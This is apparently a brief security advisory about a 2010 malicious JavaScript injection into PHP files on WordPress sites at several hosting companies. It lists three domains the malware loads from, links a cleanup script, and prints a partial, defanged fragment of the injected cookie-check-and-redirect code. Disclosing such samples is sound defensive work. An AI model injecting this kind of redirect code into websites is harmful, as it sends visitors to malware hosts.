Description: Code used to insert a malicious javascript on many
sites hosted at GoDaddy, Bluehost and many other hosting companies.
Loads malware from:
http://whereisdudescars.com/
http://nowisisdudescars.com/
http://sippa.dottasink.net/
It infects all PHP files, targeting specifically WordPress sites.
Clean up:: Run the following script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html or contact support@sucuri.net for help.
Malware dump (base 64 added to the .php files):
if (mycookie==-1)
{
if (navigator.cookieEnabled == true)
{
if (gotourl!=”")
{
document.cookie=name + “=” + escape(value) + “; max-age=” + maxage + “; path=/”;
location DOT replace(gotourl);
}
}
}
Loading